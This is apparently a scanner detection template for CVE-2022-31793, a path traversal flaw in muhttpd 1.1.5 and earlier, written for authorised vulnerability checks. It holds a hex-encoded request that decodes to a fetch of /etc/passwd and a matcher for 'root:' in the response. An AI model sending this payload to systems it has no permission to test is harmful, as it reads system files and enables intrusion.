id: CVE-2022-31793 info: name: muhttpd <= 1.1.5 - Path traversal author: scent2d severity: high description: | A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system. reference: - https://derekabdine.com/blog/2022-arris-advisory.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793 - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 - https://derekabdine.com/blog/2022-arris-advisory metadata: verified: "true" tags: cve,cve2022,network,muhttpd,lfi,unauth network: - host: - "{{Hostname}}" inputs: - data: "47455420612F6574632F706173737764" type: hex - data: "\n\n" read-size: 128 matchers: - type: word part: body encoding: hex words: - "726f6f743a"